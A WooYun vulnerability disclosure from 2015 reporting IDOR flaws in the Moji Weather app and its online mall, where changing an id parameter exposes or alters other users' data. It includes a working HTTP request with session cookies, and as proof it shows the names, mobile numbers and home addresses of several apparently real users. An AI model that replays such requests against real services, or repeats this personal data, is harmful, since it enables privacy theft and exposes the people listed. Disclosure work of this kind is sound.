当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156805

漏洞标题:墨迹天气app多处平行权限(泄露用户信息)

相关厂商:mojichina.com

漏洞作者: getshell1993

提交时间:2015-11-30 11:47

修复时间:2016-01-15 17:54

公开时间:2016-01-15 17:54

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

多处平行权限

详细说明:

问题比较多 这里列举几处

moji01.png


关注好友时的url id替换一下 可刷粉丝

moji03.png


任何评论的地方 id换成别人的

moji02.png


随便找了个用户id 评论

moji04.png


接着来到墨迹商城

moji05.png


POST /address/getAddress HTTP/1.1
Host: mall.moji.com
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11B554a mojii/50050700
X-Requested-With: XMLHttpRequest
Accept: application/json
Referer: http://mall.moji.com/address/list/25776298/myshop/0
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: 719=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; county=%E4%B8%9C%E5%9F%8E%E5%8C%BA; goods_id=719; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1448776360; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1448775098; moji_sessionid=AES517075706473424D6D516C664C6459746530717662513D3D; snsid=25776298; PHPSESSID=eav5ogbjgb32fq18cthj8mn2e3
Proxy-Connection: keep-alive
Content-Length: 8
Origin: http://mall.moji.com
Accept-Encoding: gzip, deflate
id=58583
更换id可查看他人地址信息

漏洞证明:

数万用户详细信息 简单挑几个证明一下

"data":{"id":"58582","user_id":"25228138","consignee":"曾偉宸","email":"","country":"0","province":"江苏省","city":"苏州市","district":"虎丘区","address":"高新區金楓路233號名碩電腦研發宿舍4262室","zipcode":"215000","mobile":"18860923685"
"data":{"id":"58580","user_id":"25800140","consignee":"秦正龙","email":"","country":"0","province":"河南省","city":"开封市","district":"兰考县","address":"三营,赵会杰家收","zipcode":"182365","mobile":"18236509217"
"data":{"id":"58579","user_id":"25247752","consignee":"张克南","email":"","country":"0","province":"安徽省","city":"合肥市","district":"蜀山区","address":"望江西路666号科大讯飞","zipcode":"230011","mobile":"13965030493"
"data":{"id":"58578","user_id":"25797896","consignee":"王新星","email":"","country":"0","province":"北京市","city":"北京市","district":"朝阳区","address":"百子园路后现代城12号楼1010","zipcode":"100022","mobile":"13426012180"
"data":{"id":"58577","user_id":"25797815","consignee":"林学谦","email":"","country":"0","province":"福建省","city":"南平市","district":"延平区","address":"福建省南平市第三中学","zipcode":"353000","mobile":"13656963996"
………………


修复方案:

控制权限

版权声明:转载请注明来源 getshell1993@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-01 17:52

厂商回复:

attention项目问题存在,而且是我们已知的问题,已经着手解决。 商城的问题之前已经披露过并修复了,谢谢提醒。

最新状态:

暂无